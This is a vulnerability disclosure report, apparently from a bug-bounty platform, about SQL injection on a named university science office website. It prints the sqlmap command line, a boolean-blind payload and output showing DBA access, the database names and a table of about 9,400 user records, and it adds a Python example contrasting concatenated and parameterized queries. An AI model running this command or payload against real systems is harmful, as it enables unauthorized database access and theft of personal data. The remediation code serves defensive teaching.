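2015-11-25: Details reported to the vendor; awaiting vendor handling
2015-11-30: The vendor actively ignored the vulnerability; details disclosed to the public
SQL injection vulnerability in the Zhejiang Gongshang University Science and Technology Office website (DBA privileges / sa password leaked / information on more than nine thousand users leaked)
Address: http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534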
$ python sqlmap.py -u "http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534" -p id --technique=B --random-agent --batch --search -C pass
Database: kyc
+----------+---------+
| Table    | Entries |
+----------+---------+
| dbo.Work | 9401    |
+----------+---------+

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
current user: 'sa'
current user is DBA: True
database management system users [3]:
[*] BUILTIN\\Administrators
[*] sa
[*] sa1

available databases [8]:
[*] kyc
[*] kyc22
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Add filtering
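An added example, not part of the original report and not the site's code: it shows why the `id` value above acts as a true/false oracle when concatenated into the query, and how a bound parameter plus a format check closes it. Assumptions: an in-memory sqlite3 table stands in for the SQL Server 2000 back end, and the `news` schema, the function names and the false-condition variant of the payload are constructed.

```python
import sqlite3

# Value of the id parameter from the sqlmap output above, and a constructed
# variant whose added condition is false.
TRUE_CASE = "534' AND 1276=1276 AND 'mrHr'='mrHr"
FALSE_CASE = "534' AND 1276=1277 AND 'mrHr'='mrHr"

def make_db():
    # Constructed stand-in for the table behind news.do (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id TEXT PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES ('534', 'constructed headline')")
    return db

def view_concat(db, news_id):
    # 'Before': the request value is spliced into the SQL text, so a quote
    # inside it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT title FROM news WHERE id = '" + news_id + "'"
    return db.execute(sql).fetchall()

def view_param(db, news_id):
    # 'After', step 1: the value is bound as data and is never parsed as SQL.
    return db.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchall()

def view_checked(db, news_id):
    # 'After', step 2: reject anything that is not a short decimal id before
    # the database is touched, then use the bound query.
    if not (news_id.isascii() and news_id.isdigit() and len(news_id) <= 9):
        raise ValueError("id must be a short decimal number")
    return view_param(db, news_id)

def oracle_rows(view):
    # Row counts for the true and false cases; a difference between them is
    # the signal a boolean-based blind technique relies on.
    db = make_db()
    return len(view(db, TRUE_CASE)), len(view(db, FALSE_CASE))

if __name__ == "__main__":
    print("concatenated:", oracle_rows(view_concat))
    print("parameterized:", oracle_rows(view_param))
```

The format check alone is not the fix; the bound parameter is what removes the injection, and the check keeps malformed ids out of the query path and out of error handling.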
Severity: no impact (ignored by vendor)
Ignored at: 2015-11-30 14:40
None yet